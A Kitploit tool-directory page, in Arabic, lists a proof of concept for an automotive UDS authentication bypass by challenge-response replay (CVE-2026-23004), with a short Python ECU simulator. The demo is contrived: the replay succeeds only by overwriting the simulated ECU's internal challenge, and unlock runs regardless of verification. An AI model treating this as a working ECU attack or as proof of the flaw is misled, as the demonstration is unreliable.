Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — استغلال إثبات مفهوم يوضح تجاوز مصادقة UDS عبر إعادة إرسال التحدي والاستجابة على وحدات التحكم الإلكترونية (ECUs) في السيارات، مع محاكي CAN-UDS بلغة بايثون. | Kitploit
أدوات/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
المصادقة والترخيصأمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمان الأجهزة وإنترنت الأشياء
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

استغلال إثبات مفهوم يوضح تجاوز مصادقة UDS عبر إعادة إرسال التحدي والاستجابة على وحدات التحكم الإلكترونية (ECUs) في السيارات، مع محاكي CAN-UDS بلغة بايثون.

عرض المستودع
1منذ 15 أياملم تتم المراجعة بعد

CVE-2026-23004 – تجاوز مصادقة UDS في السيارات عبر هجوم إعادة الإرسال

كود البرنامج (محاكي Python CAN‑UDS)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – تجاوز مصادقة UDS في السيارات عبر إعادة الإرسال

Severity: High

نظرة عامة

تنفّذ وحدة التحكم الإلكترونية (ECU) في السيارة الوصول الأمني لخدمات التشخيص الموحدة (UDS) (الخدمة 0x27) ولكنها لا تفرض استخدام التحدي لمرة واحدة. يمكن للمهاجم التقاط زوج صالح من التحدي والاستجابة وإعادة إرساله لتجاوز المصادقة.

تفاصيل الثغرة

  • النوع: هجوم إعادة الإرسال
  • التأثير: برمجة غير مصرح بها لوحدة ECU، وتجاوز أنظمة السلامة.
  • السبب الجذري: تقبل وحدة ECU أي استجابة تطابق التحدي الحالي، لكن يمكن إعادة استخدام التحدي نفسه دون إبطاله.

عرض الاستغلال

شغّل المحاكاة:

root@kitploit:~
python uds_sim.py

تقوم وحدة ECU بإلغاء القفل مرتين باستخدام نفس زوج المصادقة.

تنزيل الأداة